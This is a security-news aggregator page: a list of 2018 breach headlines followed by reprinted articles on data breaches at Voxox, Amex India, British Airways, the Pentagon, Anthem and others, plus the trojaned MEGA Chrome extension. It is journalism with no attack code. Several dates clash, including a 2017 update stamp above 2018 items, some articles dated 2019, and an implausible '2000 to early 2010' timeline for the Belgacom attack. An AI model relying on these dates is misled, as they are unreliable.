- Incident -

Last update 09.10.2017 13:51:08





17.12.18  Equifax: A study in accountability but not authority responsibility (Incindent, Net-security)
13.12.18  ID Numbers for 120 Million Brazilians taxpayers exposed online (Incindent, Securityaffairs)
13.12.18  U.S. House Report Blasts Equifax Over Poor Security Leading to Massive 2017 Breach (Incindent, Securityweek)
13.12.18  Personal Details of 120 Million Brazilians Exposed (Incindent, Securityweek)
13.12.18  Taxpayer ID Numbers for 120 Million Brazilians Exposed Online (Incindent, Bleepingcomputer)
11.12.18  Hackers Steal Over 40k Logins for Gov Services in 30 Countries (Incindent, Bleepingcomputer)
11.12.18  Organizations Still Slow to Detect Breaches: CrowdStrike (Incindent, Securityweek)
11.12.18  30% of healthcare databases are exposed online (Incindent, Net-security)
7.12.18  New Lawsuit Claims Marriott Still Exposes Customer Information (Incindent, Securityweek)
7.12.18  Evidence in Marriott’s subsidiary Starwood hack points out to China intel (Incindent, Securityaffairs)
6.12.18  Unprotected MongoDB Exposes Scraped Profile Data of 66 Million (Incindent, Bleepingcomputer)
6.12.18  DarkVishnya: Banks attacked through direct connection to local network (Incindent, Kaspersky)
5.12.18  Quora Breach Exposes a Wealth of Info on 100M Users (Incindent, Threatpost)
5.12.18  1-800-Flowers Becomes Latest Payment Breach Victim (Incindent, Threatpost)
5.12.18  Magecart Group Ups Ante: Now Goes After Admin Credentials (Incindent, Threatpost)
4.12.18  Quora Hacked - 100 Million User's Data Exposed (Incindent, Bleepingcomputer)
4.12.18  KoffeyMaker: notebook vs. ATM (Incindent, Kaspersky)
4.12.18  Quora data breach: hackers obtained information on roughly 100 million users (Incindent, Securityaffairs)
4.12.18  Quora Data Breach Hits 100 Million Users (Incindent, Securityweek)
4.12.18  Schumer Says Marriott Should Pay to Replace Hacked Passports (Incindent, Securityweek)
4.12.18  Quora Gets Hacked – 100 Million Users Data Stolen (Incindent, Thehackernews)
4.12.18  Chris Vickery on the Marriott Breach and a Rash of Recent High-Profile Hacks (Incindent, Threatpost)
3.12.18  Experts found data belonging to 82 Million US Users exposed on unprotected Elasticsearch Instances (Incindent, Securityaffairs)
3.12.18  Espionage, ID Theft? Myriad Risks From Stolen Marriott Data (Incindent, Securityweek)
3.12.18  Lawsuits Filed Against Marriott Over Massive Data Breach (Incindent, Securityweek)
2.12.18  Marriott Starwood data breach: 5 defensive steps travelers should take now (Incident blog, Eset)
1.12.18  327 million Marriott guests affected in Starwood Data Breach (Incindent, Securityaffairs)
30.11.18  Marriott Hit by Massive Data Breach: 500 Million Starwood Customers Impacted (Incindent, Securityweek)
30.11.18  Marriott Data Breach Affects 500 Million Starwood Guests (Incindent, Bleepingcomputer)
30.11.18  2014 Marriott Data Breach Exposed, 500M Guests Impacted (Incindent, Threatpost)
30.11.18  SKY Brasil Exposes 32 Million Customer Records (Incindent, Bleepingcomputer)
30.11.18  Records of 114 Million US Citizen and Companies Exposed Online (Incindent, Bleepingcomputer)
30.11.18  Dell Systems Hacked to Steal Customer Information (Incindent, Bleepingcomputer)
29.11.18  Dell Resets User Passwords Following Data Breach (Incindent, Securityweek)
29.11.18  Records of 114 Million US Citizen and Companies Exposed Online (Incindent, Bleepingcomputer)
29.11.18  Dell Systems Hacked to Steal Customer Information (Incindent, Bleepingcomputer)
29.11.18  AccuDoc Data Breach impacted 2.6 Million Atrium Health patients (Incindent, Securityaffairs)
29.11.18  Dell Resets All Customers' Passwords After Potential Security Breach (Incindent, Thehackernews)
29.11.18  Dell Warns of Attempted Breach on Network (Incindent, Threatpost)
28.11.18  The One Planet York Data Breach That Was a Data Leak (Incindent, Bleepingcomputer)
28.11.18  Industry Reactions to USPS Exposing User Data (Incindent, Securityweek)
28.11.18  Data Breach Hits 2.6 Million Atrium Health Patients (Incindent, Securityweek)
28.11.18  Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach (Incindent, Securityaffairs)
27.11.18  Uber Fined Nearly $1.2 Million by Dutch, UK Over Data Breach (Incindent, Securityweek)
27.11.18  Uber fined $1.1 million by UK and Dutch regulators over 2016 data breach (Incindent, Thehackernews)
27.11.18  Uber Fined for Covering Up 2016 Data Breach (Incindent, Bleepingcomputer)
27.11.18  When Do You Need to Report a Data Breach? (Incindent, Securityaffairs)
27.11.18  USPS, Amazon Data Leaks Showcase API Weaknesses (Incindent, Threatpost)
27.11.18  Knuddels Flirt App Slapped with Hefty Fine After Data Breach (Incindent, Threatpost)
26.11.18  HR Software Firm PageUp Finds No Evidence of Data Theft (Incindent, Securityweek)
24.11.18  Software company OSIsoft has suffered a data breach (Incindent, PBWCZ.CZ)
23.11.18  US Postal Service Exposes Data of 60 Million Users for Over a Year (Incindent, Bleepingcomputer)
23.11.18  Software company OSIsoft has suffered a data breach (Incindent, Securityaffairs)
22.11.18  A flaw in US Postal Service website exposed data on 60 Million Users (Incindent, PBWCZ.CZ)
22.11.18  US Postal Service Left 60 Million Users Data Exposed For Over a Year (Incindent, Thehackernews)
22.11.18  Amazon Data Leak Exposes Email Addresses Right Before Black Friday (Incindent, Bleepingcomputer)
21.11.18  MageCart Group Sabotages Rival to Ruin Data and Reputation (Incindent, Bleepingcomputer)
20.11.18  VisionDirect Data Breach Caused by MageCart Attack (Incindent, Bleepingcomputer)
19.11.18  VisionDirect Blindsided by Magecart in Data Breach (Incindent, Threatpost)
19.11.18  Ford Eyes Use of Customers’ Personal Data to Boost Profits (Incindent, Threatpost)
16.11.18  Infowars Store Affected by Magecart Credit Card Stealing Hack (Incindent, Bleepingcomputer)
15.11.18  Cathay Apologizes Over Data Breach but Denies Cover-up (Incindent, PBWCZ.CZ)
14.11.18  Cathay Says 'Most Intense' Period of Data Breach Lasted Months (Incindent, PBWCZ.CZ)
13.11.18  Cathay Pacific waited six months before disclosing the security breach (Incindent, PBWCZ.CZ)
7.11.18  HSBC Bank USA Warns Customers of Data Breach (Incindent, PBWCZ.CZ)
3.11.18  Radisson Hotel Group Hit by Data Breach (Incindent, PBWCZ.CZ)
1.11.18  The Radisson Hotel Group has suffered a data breach (Incindent, PBWCZ.CZ)
31.10.18  Girl Scouts data breach exposed personal information of 2,800 members (Incindent, PBWCZ.CZ)
27.10.18  British Airways: additional 185,000 passengers may have been affected (Incindent, PBWCZ.CZ)
27.10.18  Questions Mount Over Delay After Cathay Pacific Admits Huge Data Leak (Incindent, PBWCZ.CZ)
25.10.18  Cathay Pacific Hit by Data Leak Affecting 9.4M Passengers (Incindent, PBWCZ.CZ)
25.10.18  Magecart Hackers Now Targeting Vulnerable Magento Extensions (Incindent, PBWCZ.CZ)
25.10.18  Cathay Pacific data breach affecting 9.4 million passengers (Incindent, PBWCZ.CZ)
25.10.18  Yahoo to Pay $50M, Other Costs for Massive Security Breach (Incindent, PBWCZ.CZ)
22.10.18  Hackers breached into system that interacts with HealthCare.gov (Incindent, PBWCZ.CZ)
13.10.18  Fitmetrix fitness software company may have exposed millions of customer records (Incindent, PBWCZ.CZ)
10.10.18  Project Strobe, what will change after the Google security breach? (Incindent, PBWCZ.CZ)
10.10.18  Google Tightens Rules Around App Permissions (Incindent, PBWCZ.CZ)
9.10.18  California to Ban Weak Passwords (Incindent, PBWCZ.CZ)
7.10.18  Sales intel firm Apollo data breach exposed more than 200 million contact records (Incindent, PBWCZ.CZ)
27.9.18  Firefox Notifies Users of Compromised Accounts (Incindent, PBWCZ.CZ)
27.9.18  Uber agrees to pay $148 million in massive 2016 data breach settlement (Incindent, PBWCZ.CZ)
25.9.18  Over 6 Million Users Hit by Breach at Fashion Retailer SHEIN (Incindent, PBWCZ.CZ)
25.9.18  SHEIN Data breach affected 6.42 million users (Incindent, PBWCZ.CZ)
22.9.18  Card Data-Scraping Magecart Code Found on Newegg (Incindent, PBWCZ.CZ)
20.9.18  Click2Gov Attacks on U.S. Cities Attributed to Previously Unknown Group (Incindent, PBWCZ.CZ)
20.9.18  Access to over 3,000 compromised sites sold on Russian black marketplace MagBo (Incindent, PBWCZ.CZ)
18.9.18  Amazon Probing Staff Data Leaks (Incindent, PBWCZ.CZ)
14.9.18  Operator at kayo.moe found a 42M Record Credential Stuffing Data ready to use (Incindent, PBWCZ.CZ)
12.9.18  British Airways, Another Victim of Ongoing Magecart Attacks (Incindent, PBWCZ.CZ)
10.9.18  GAO Report shed the lights on the failures behind the Equifax hack (Incindent, PBWCZ.CZ)

Millions of password resets and 2FA codes exposed in unsecured Voxox DB
19.11.18 securityaffairs  Hacking 
Incindent

Millions of password resets and two-factor authentication codes were exposed in an unsecured Voxox database.
Sébastien Kaul, a security researcher based in Berlin, discovered a poorly secured database owned by the communications firm Voxox. It contained names, phone numbers, tens of millions of SMS messages, temporary passwords, two-factor codes, shipping alerts, and other information belonging to customers of companies including Microsoft, Amazon, and Google.

It has been estimated that the exposed archive included at least 26 million text messages year-to-date.

“Although Kaul found the exposed server on Shodan, a search engine for publicly available devices and databases, it was also attached to one of Voxox’s own subdomains.” reported Techcrunch.

“Worse, the database — running on Amazon’s Elasticsearch — was configured with a Kibana front-end, making the data within easily readable, browsable and searchable for names, cell numbers and the contents of the text messages themselves.”

Voxox data leak

Voxox took the database offline promptly after TechCrunch contacted the company about it.

Anyone who accessed the database while it was exposed online could have obtained the two-factor codes users needed to log in to their accounts, potentially exposing those users to account takeover.

Below are TechCrunch’s findings from a cursory review of the data:

We found a password sent in plaintext to a Los Angeles phone number by dating app Badoo;
Several Booking.com partners were sent their six-digit two-factor codes to log in to the company’s extranet corporate network;
Fidelity Investments also sent six-digit security codes to one Chicago Loop area code;
Many messages included two-factor verification codes for Google accounts in Latin America;
A Mountain View, Calif.-based credit union, the First Tech Federal Credit Union, also sent a temporary banking password in plaintext to a Nebraska number;
We found a shipping notification text sent by Amazon with a link, which opened up Amazon’s delivery tracking page, including the UPS tracking number, en route to its destination in Florida;
Messenger apps KakaoTalk and Viber, and quiz app HQ Trivia use the service to verify user phone numbers;
We also found messages that contained Microsoft’s account password reset codes and Huawei ID verification codes;
Yahoo also used the service to send some account keys by text message;
And, several small to mid-size hospitals and medical facilities sent reminders to patients about their upcoming appointments, and in some cases, billing inquiries.
Kevin Hertz, Voxox’s co-founder and chief technology officer, wrote in an email that the company is “looking into the issue and following standard data breach policy at the moment,” and that the company is “evaluating impact.”


689,272 plaintext records of Amex India customers exposed online
9.11.18 securityaffairs Hacking 
Incindent

689,272 plaintext records belonging to Amex India customers were exposed online via an unsecured MongoDB server.
Personal details of nearly 700,000 American Express India (Amex India) customers were exposed online via an unsecured MongoDB server.

The trove of data was discovered by Bob Diachenko of the cybersecurity firm Hacken. Most of the records were encrypted, but 689,272 were stored in plaintext.

The expert located the database by using IoT search engines such as Shodan and BinaryEdge.io.

“On 23rd October I discovered an unprotected Mongo DB which allowed millions of records to be viewed, edited and accessed by anybody who might have discovered this vulnerability. The records appeared to be from an American Express branch in India.” states the blog post published by Diachenko.


The 689,272 plaintext records included Amex India customers’ phone numbers, names, email addresses, and ‘type of card’ description fields.

The archive also included 2,332,115 records containing encrypted data (i.e. names, addresses, Aadhaar numbers, PAN card numbers, and phone numbers).

Bob Diachenko (@MayhemDayOne), 10:12 AM - Oct 25, 18:
Seems like @AmexIndia exposed its #MongoDB for a while, with some really sensitive data (base64 encrypted). Now secured (just when I was preparing responsible disclosure), but question remains how long it was open. Found with @binaryedgeio engine.
“Upon closer examination, I am inclined to believe that the database was not managed by AmEx itself but instead by one their subcontractors who were responsible for SEO or lead generation. I came to this conclusion since many of the entries contained fields such as ‘campaignID’, ‘prequalstatus’ and ‘leadID’ etc.” added Diachenko.

Diachenko promptly reported his findings to Amex India, which immediately took down the server. At the time of writing it is not clear how long the server remained exposed online; Amex India, which investigated the case, stated that it found no “evidence of unauthorized access.”

“We applaud AmEx’s rapid response to this issue, noting they immediately took down that server upon notification and began further investigations.” Diachenko concluded.

“As we learned from this incident, one never knows when transient firewall rules may inadvertently expose your development machines to the public. In this case, it appears to have only exposed some long-lost personal information of an unknown number of AmEx India customers, but for others, it could be critical intellectual property or even your entire subscriber base that is at risk of being exposed.”


Top Australia Defence Firm Reports Serious Cyber Breach
2.11.18 securityweek
Incindent

A top Australian defence firm with major US Navy contracts has admitted its personnel files were breached and that it was the subject of an extortion attempt.

Austal -- which among other things makes small, quick ships for warfare close to shore -- said its "data management system" had been infiltrated by an "unknown offender".

In a statement, the company claimed that there was "no evidence to date" that "information affecting national security nor the commercial operations of the company have been stolen".

However, it said staff email addresses and mobile phone numbers were accessed and that the offender purported to offer materials for sale on the internet and "engage in extortion".

"The company has not and will not respond to extortion attempts."

Australia's department of defence said it "can confirm that no compromise of classified or sensitive information or technology has been identified so far."

The company was at pains to point out that the breach hit only its Australian business and did not extend to US projects, because the two computer systems are not linked.

Austal has won a controversial contract to build littoral combat ships for the US Navy.

The military says it does not need all the vessels paid for, but the project has been aggressively championed by powerful members of the US Congress from Alabama, where Austal's US shipyard is located.


The Belgacom hack was the work of the UK GCHQ intelligence agency
29.10.2019 securityaffairs
BigBrothers  Incindent

Belgian newspaper reported that investigators had found proof that the Belgacom hack was the work of the UK GCHQ intelligence agency.
Back in September 2013, Belgacom (now Proximus), the largest telecommunications company in Belgium and primarily state-owned, announced that its IT infrastructure had suffered a malware-based attack.

We return to this incident because the Belgian newspaper De Standaard has published new details from a Belgian judicial investigation into the alleged involvement of the British GCHQ.

Many experts linked the Regin malware to the Five Eyes alliance: they found alleged references to the spyware in a number of presentations leaked by Edward Snowden, and according to malware researchers it has been used in targeted attacks against government agencies in the EU and against the Belgian telecoms company Belgacom.

According to the Snowden documents, the UK’s signals intelligence agency hacked into the Belgian telco to spy on private communications transiting its infrastructure.

This week the Belgian newspaper De Standaard reported that investigators had found proof that the hack “was the work of the GCHQ, an intelligence service of ally Great Britain”.

“This can all be read in a confidential report from the federal prosecutor’s office that the National Security Council discussed at the beginning of this week,” reported De Standaard.

The newspaper also states that federal prosecutors found evidence of UK intelligence involvement in the hack that is independent of the Snowden revelations.

“Specifically, these are IP addresses of computers where the spyware software communicated from Belgacom. Three of those addresses were owned by a British company, indicating that the spy software manager is in Great Britain,” continues the newspaper.


The newspaper added that the British Home Office refused to co-operate with the investigation.

If confirmed, the situation is disconcerting: the UK, along with other members of the Five Eyes, was spying on a telco belonging to a fellow member of the NATO alliance.

The investigation revealed that the malware-based attack was carried out by GCHQ and code-named Operation Socialist.

In the attack, which ran between 2000 and early 2010, the hackers targeted company admins with spear-phishing aimed at infecting their machines.

The attackers infected the machines of at least three Belgian engineers and used them as entry points into Belgacom’s networks, going on to infect more than 5,000 machines.

“A GCHQ document reviewing operations conducted between January and March 2011 noted that the hack on Belgacom was successful, and stated that the agency had obtained access to the company’s systems as planned. By installing the malware on the engineers’ computers, the spies had gained control of their machines, and were able to exploit the broad access the engineers had into the networks for surveillance purposes.” wrote The Intercept.

“The document stated that the hacking attack against Belgacom had penetrated “both deep into the network and at the edge of the network,” adding that ongoing work would help “further this new access.”

GCHQ targeted the Belgacom International Carrier Services mainly because it handled a large amount of Middle Eastern roaming traffic.


BA Says 185,000 More Customers Affected in Cyber Attack
27.10.2019 securityweek
Attack  Incindent

British Airways owner IAG on Thursday said that a further 185,000 customers may have had their personal details stolen in a cyber attack earlier this year.

This includes the holders of 77,000 payment cards whose name, billing address, email address and card payment information may have been compromised.

A further 108,000 people's personal details without card verification value have also been compromised, the airline said in a statement.

"While British Airways does not have conclusive evidence that the data was removed from its systems, it is taking a prudent approach in notifying potentially affected customers, advising them to contact their bank or card provider as a precaution," it said.

The company, which has promised to compensate any affected customers, said there had been no verified cases of fraud since its first announcement about the cyber attack in September.

BA at the time took out full-page adverts in the UK newspapers to apologise to customers and called the theft "a very sophisticated, malicious, criminal attack on our website".

The company could be expected to comment further on the attack when IAG publishes its third quarter results on Friday.

The attack came after previous IT woes, including a worldwide system outage last year that affected thousands of customers.


Insurer Anthem Will Pay Record $16M for Massive Data Breach
18.10.18 securityweek
Incindent

The nation's second-largest health insurer has agreed to pay the government a record $16 million to settle potential privacy violations in the biggest known health care hack in U.S. history, officials said Monday.

The personal information of nearly 79 million people — including names, birthdates, Social Security numbers and medical IDs — was exposed in the cyberattack, discovered by the company in 2015.

The settlement between Anthem Inc. and the Department of Health and Human Services represents the largest amount collected by the agency in a health care data breach, officials said.

"When you have large breaches it erodes people's confidence in the privacy of their sensitive information, and we believe such a large breach of trust merits a substantial payment," said Roger Severino, director of the HHS Office for Civil Rights. The office also enforces the federal health care privacy law known as HIPAA, or the Health Insurance Portability and Accountability Act.

Severino said the Anthem settlement is nearly three times larger than the previous record amount paid to the government in a privacy case. That sends a message to the industry that "hackers are out there always and large health care entities in particular are targets," he added.

The Blue Cross-Blue Shield insurer also agreed to a corrective action plan under government monitoring, which involves a process for the company to assess its electronic security risks, take appropriate countermeasures and maintain ongoing surveillance.

Indianapolis-based Anthem covers more than 40 million people and sells individual and employer coverage in key markets like New York and California. The payment is in lieu of civil penalties that HHS may have imposed. Anthem admitted no liability. The civil case involving privacy laws is separate from any other investigation the government may be pursuing.

In a statement Monday, Anthem said it's not aware of any fraud or identity theft stemming from the breach. The company provided credit monitoring and identity theft insurance to all customers potentially affected.

"Anthem takes the security of its data and the personal information of consumers very seriously," the statement said. "We have cooperated with (the government) throughout their review and have now reached a mutually acceptable resolution."

The company discovered the data breach in early 2015, but hackers had been burrowing into its systems for weeks. Security experts said at the time that the size and scope of the attack indicated potential involvement by a foreign government.

Hackers used a common email technique called spear-phishing in which unwitting company insiders are tricked into revealing usernames and passwords. The Anthem attackers gained the credentials of system administrators, allowing them to probe deeply into the insurer's systems.

HHS said its investigation found that Anthem had failed to deploy adequate measures for countering hackers. The company lacked an enterprisewide risk analysis, had insufficient procedures to monitor activity on its systems, failed to identify and respond to suspected or known security incidents, and did not implement "adequate minimum access controls" to shut down intrusions from as early as February 2014.


Pentagon Defense Department travel records data breach
14.10.18 securityaffairs
Incindent

Pentagon – Defense Department travel records suffered a data breach that compromised the personal information and credit card data of U.S. military and civilian personnel.
The Pentagon revealed that the Defense Department travel records suffered a data breach that compromised the personal information and credit card data of U.S. military and civilian personnel.

The data breach could have happened some months ago and could have affected as many as 30,000 workers. Department leaders were notified of the breach on October 4.

“According to a U.S. official familiar with the matter, the breach could have affected as many as 30,000 workers, but that number may grow as the investigation continues. The breach could have happened some months ago but was only recently discovered.” reads the post published by the Associated Press.

“The official, who spoke on condition of anonymity because the breach is under investigation, said that no classified information was compromised.”


Lt. Col. Joseph Buccino, a Pentagon spokesman, said the Department is still investigating the incident; the breach affected a still-unidentified commercial vendor that provided services to the Defense Department.

“It’s important to understand that this was a breach of a single commercial vendor that provided service to a very small percentage of the total population” of Defense Department personnel, said Buccino.

“The department is continuing to assess the risk of harm and will ensure notifications are made to affected personnel,” said the statement, adding that affected individuals will be informed in the coming days and fraud protection services will be provided to them.

The department is not identifying the vendor for security reasons. The vendor is still under contract, but the department “has taken steps to have the vendor cease performance under its contracts.”


Pentagon Reveals Cyber Breach of Travel Records
14.10.18 securityweek
BigBrothers  Incindent

The Pentagon on Friday said there has been a cyber breach of Defense Department travel records that compromised the personal information and credit card data of U.S. military and civilian personnel.

According to a U.S. official familiar with the matter, the breach could have affected as many as 30,000 workers, but that number may grow as the investigation continues. The breach could have happened some months ago but was only recently discovered.

The official, who spoke on condition of anonymity because the breach is under investigation, said that no classified information was compromised.

According to a Pentagon statement, a department cyber team informed leaders about the breach on Oct. 4.

Lt. Col. Joseph Buccino, a Pentagon spokesman, said the department is still gathering information on the size and scope of the hack and who did it.

"It's important to understand that this was a breach of a single commercial vendor that provided service to a very small percentage of the total population" of Defense Department personnel, said Buccino.

The vendor was not identified and additional details about the breach were not available.

"The department is continuing to assess the risk of harm and will ensure notifications are made to affected personnel," said the statement, adding that affected individuals will be informed in the coming days and fraud protection services will be provided to them.

Buccino said that due to security reasons, the department is not identifying the vendor. He said the vendor is still under contract, but the department "has taken steps to have the vendor cease performance under its contracts."

Disclosure of the breach comes on the heels of a federal report released Tuesday that concluded that military weapons programs are vulnerable to cyberattacks and the Pentagon has been slow to protect the systems. And it mirrors a number of other breaches that have hit federal government agencies in recent years, exposing health data, personal information, and social security numbers.

The U.S. Government Accountability Office in its Tuesday report said the Pentagon has worked to ensure its networks are secure, but only recently began to focus more on its weapons systems security. The audit, conducted between September 2017 and October 18, found that there are "mounting challenges in protecting its weapons systems from increasingly sophisticated cyber threats."

In 2015, a massive hack of the federal Office of Personnel Management, widely blamed on China's government, compromised personal information of more than 21 million current, former and prospective federal employees, including those in the Pentagon. It also likely occurred months before it was discovered and made public, and it eventually led to the resignation of the OPM director.

Also that year, hackers breached the email system used by the Joint Chiefs of Staff, affecting several thousand military and civilian workers.

The Defense Department has consistently said that its networks and systems are probed and attacked thousands of times a day.


BA Scrambles to Address Theft of Passenger Bank Details
8.9.18 securityweek Incindent

British Airways will financially compensate customers whose data were stolen in a "sophisticated" and "malicious" hack, chief executive Alex Cruz said Friday as he apologised for the fiasco.

BA late Thursday revealed that personal and financial details of customers who booked flights on the group's website and mobile phone app between August 21 and Wednesday had been stolen.

The revelation comes just a few months after the European Union tightened data protection laws.

"We're extremely sorry for what has happened," Cruz told the BBC on Friday.

"There was a very sophisticated, malicious, criminal attack on our website."

BA took out full-page adverts in the UK newspapers on Friday to apologise to customers, while the share price of parent group IAG was down more than three percent in London deals.

"We are 100 percent committed to compensate them," Cruz said.

"We will compensate them for any financial hardship that they may have suffered," he told the broadcaster.

BA said it had launched an urgent investigation after realising that about 380,000 bank cards used to book its flights had been hacked.

The stolen data comprised customer names, postal addresses, email addresses and credit card information.

However, the 15-day breach did not involve travel or passport details and has been fixed, the airline added.

- Regulators investigate -

"The moment we found out (Wednesday) that actual customer data had been compromised, that's when we began an all out immediate communication to our customers. That was our priority," Cruz said.

However Enza Iannopollo, privacy and security analyst at advisory group Forrester, said BA could have done better on informing those affected.

"If the timeline is confirmed and BA became aware of the breach on the evening of September 5th, then they have done their breach notification on time, which is of course a good thing," she said in a statement.

"However, customers are obviously not impressed about BA breach management at present. Some discovered it on social media, others reported wasting hours on the phone with their bank, everyone expects more from a company that truly cares about its customers."

"Terrible handling of the situation," tweeted one affected customer, Mat Thomas.

Iannopollo told AFP that it was too early to know whether BA would be fined over the affair.

"Regulators will assess the circumstances of this breach consistently with GDPR requirements," she said referring to the EU's General Data Protection Regulation that came into force in May.

Britain's National Crime Agency said it was assessing the matter, while the UK's data protection watchdog, the Information Commissioner's Office, will make its own enquiries.

"The ICO will do its assessment and investigation to determine whether to levy a fine or impose any enforcement action, but this will take some time and it might be that the regulator determines that rules were not breached," Iannopollo said.

About 1100 GMT, shares in IAG, which also runs the Spanish carriers Iberia and Vueling as well as Irish airline Aer Lingus, were down 3.5 percent at 657.60 pence on London's benchmark FTSE 100 index, which was down 0.8 percent overall.

"Today's news is a reminder of just what a hot issue cyber security remains and the importance of companies having the right protections in place to mitigate the risk posed by attacks," noted Russ Mould, investment director at AJ Bell.


British Airways hacked, attackers stole details of 380,000 customers
7.9.18 securityaffairs Incindent

Personal and payment card information of 380,000 British Airways customers was stolen by attackers; the stolen data did not include travel or passport details.
British Airways was hacked; attackers stole the personal and payment card information of 380,000 customers. The stolen data did not include travel or passport details.

The company published a data breach notification on its website; the security breach affected customers making bookings on its website and app from 22:58 BST August 21, 2018 until 21:45 BST September 5, 2018 inclusive.

British Airways has launched an internal investigation and notified the police and relevant authorities.

“We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app. The stolen data did not include travel or passport details.” reads the data breach notification.

“From 22:58 BST August 21 2018 until 21:45 BST September 5 2018 inclusive, the personal and financial details of customers making bookings on our website and app were compromised.”

The airline confirmed that the breach has been resolved and its services are now working normally. British Airways is communicating with affected customers and is recommending customers who believe they may have been affected by the breach to contact their banks or credit card providers.

A spokesperson told the TechCrunch website that “around 380,000 card payments” were stolen.

“We are deeply sorry for the disruption that this criminal activity has caused. We take the protection of our customers’ data very seriously.” said Alex Cruz, British Airways’ chairman and chief executive.

Privacy advocates and security experts believe the company could face severe fines under the new European GDPR data protection rules.

In March 2015, British Airways Executive Club member accounts were hacked; that incident was not a data breach of BA itself, because the hackers used credentials already available in the underground.


British Airways Hacked With Details of 380,000 Cards Stolen
7.9.18 securityweek Incindent

British Airways said Thursday that the personal and financial details of customers making bookings between August 21 and September 5 were stolen in a data breach involving 380,000 bank cards.

"We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app. The stolen data did not include travel or passport details," the airline said in a statement.

"The personal and financial details of customers making bookings on our website and app were compromised," it said.

"The breach has been resolved and our website is working normally. We have notified the police and relevant authorities.

"We are deeply sorry for the disruption that this criminal activity has caused."

BA said the breach took place between 2158 GMT on August 21 and 2045 GMT on September 5.

Around 380,000 payment cards were compromised.

BA advised anyone who believed they may have been affected to contact their bank or credit card provider and follow their recommendations.

As for compensation, BA said: "We will be contacting customers and will manage any claims on an individual basis."

It said customers due to travel could check in online as normal as the incident had been resolved.

The National Crime Agency said: "We are aware of reports of a data breach affecting British Airways and are working with partners to assess the best course of action."

The NCA is set up to tackle the most serious and organised crime posing the highest risk to public security in Britain.

- Past IT issues -

BA apologised in July after technology issues caused dozens of its flights to and from London Heathrow Airport to be cancelled.

The airline said the problem was down to an incident with an IT system.

And in May 2017, British Airways suffered a major computer system failure triggered by a power supply issue near Heathrow which left 75,000 customers stranded.

IAG, which owns British Airways and Spanish carrier Iberia, said last month that first-half profits more than doubled.

Earnings after taxation flew to 1.4 billion euros ($1.6 billion) in the first six months of 2018 compared with 607 million euros a year earlier, IAG said in a results statement.

The London-listed group, which is also the owner of Irish airline Aer Lingus and Spanish carrier Vueling, added that total revenues swelled three percent to 11.2 billion euros.

BA announced last month that it will halt flights to Tehran in September, citing low profitability as the US reimposes sanctions on Iran.


MEGA Chrome browser extension hacked, bogus version stole users’ credentials
6.9.18 securityaffairs Incindent

The MEGA Chrome browser extension was hacked and replaced with one that steals users’ credentials for popular web services.
Are you using the MEGA Chrome browser extension? Uninstall it now: the Chrome extension for the MEGA file storage service was hacked and replaced with one that steals users’ credentials for popular web services (Amazon, Microsoft, GitHub and Google) and private keys for cryptocurrency wallets (MyEtherWallet, MyMonero and the Idex.market cryptocurrency trading platform).

According to Mega, on 4 September at 14:30 UTC, an attacker hacked into the company Google Chrome web store account and uploaded a malicious version 3.39.4 of the extension.

“On 4 September 2018 at 14:30 UTC, an unknown attacker uploaded a trojaned version of MEGA’s Chrome extension, version 3.39.4, to the Google Chrome webstore.” reads the security advisory published by Mega.

“Upon installation or autoupdate, it would ask for elevated permissions (Read and change all your data on the websites you visit) that MEGA’s real extension does not require and would (if permissions were granted) exfiltrate credentials for sites including amazon.com, live.com, github.com, google.com (for webstore login), myetherwallet.com, mymonero.com, idex.market and HTTP POST requests to other sites, to a server located in Ukraine. Note that mega.nz credentials were not being exfiltrated.”

Once installed, or after an auto-update, the malicious Mega Chrome extension asked for elevated permissions, used them to steal the sensitive data, and sent it back to a server controlled by the attackers and located in Ukraine (megaopac[.]host).

Four hours after the security breach, Mega uploaded a clean version (3.39.5) to the store, and affected installations were auto-updated; Google removed the malicious extension from the Chrome webstore five hours after the breach.

“You are only affected if you had the MEGA Chrome extension installed at the time of the incident, autoupdate enabled, and you accepted the additional permission, or if you freshly installed version 3.39.4,” continues the advisory.

Mega highlighted that Google no longer allows publishers to sign their own Chrome extensions and relies solely on signing them automatically once the extension is uploaded, which opens the door to similar compromises: whoever controls the publisher's webstore account can ship a validly signed update.

The Italian security researcher who handles the Twitter account @serhack_ first reported the breach on both Reddit and Twitter.

SerHack
@serhack_
!!! WARNING !!!!!!! PLEASE PAY ATTENTION!!

LATEST VERSION OF MEGA CHROME EXTENSION WAS HACKED.

Version: 3.39.4

It catches your username and password from Amazon, GitHub, Google, Microsoft portals!! It could catch #mega #extension #hacked@x0rz

7:16 PM - Sep 4, 2018
At the time it is not clear how many users have installed the malicious MEGA Chrome browser extension; experts speculate that tens of millions of users may have been affected.

The Firefox version of MEGA has not been compromised, and users accessing https://mega.nz without the Chrome extension have not been affected.

“You are only affected if you had the MEGA Chrome extension installed at the time of the incident, autoupdate enabled and you accepted the additional permission, or if you freshly installed version 3.39.4.” the company added.

“Please note that if you visited any site or made use of another extension that sends plain-text credentials through POST requests, either by direct form submission or through a background XMLHttpRequest process (MEGA is not one of them) while the trojaned extension was active, consider that your credentials were compromised on these sites and/or applications.”

Users who had installed the malicious MEGA Chrome browser extension must uninstall the version 3.39.4 and change passwords for all their accounts.

@SerHack published an interesting post on the hack; I suggest you read it.


International clothing chain C&A in Brazil suffered a data breach

6.9.18 securityaffairs Incindent
The clothing chain C&A in Brazil suffered a cyber attack on its gift card/exchange system last week, hackers leaked data on Pastebin.
The International fashion retail clothing chain C&A in Brazil suffered a data breach, the company confirmed hackers hit its gift card platform.

Hackers accessed records belonging to customers who purchased gift cards; the exposed data includes ID numbers, email addresses, the amount loaded onto the cards, order number and date of purchase.

A member of the Fatal Error Crew hacker group who uses the moniker @joshua has published on Pastebin the data of C&A customers who purchased gift cards online.

“Since you like to play with the data of others, we’ve decided to play around with your systems,” wrote hacker Joshua when he published the data.

“We would like to point out that we do not have the list of Gift Cards C&A or any other list of personal information of the customer; we mapped the same through the ID and only posted some internal information for staff. C&A confirms the invasion. We will not distribute any personal information on the internet since we do not endorse financial crimes. Customer data is secure; the few published GiftCards were in the return section, so they would be discarded – Fatal Error Crew,” reads a statement published by the Fatal Error Crew.

According to the Brazilian website Tecmundo, data of about 36,000 customers have been exposed in the attack.

“In a conversation with TecMundo, Joshua said that four million orders are exposed – Joshua says that “probably” there are data from two million different customers, considering more than one request per customer. Directly in the present card system, with their numbers, are exposed the data of 36 thousand.” reported TecMundo.


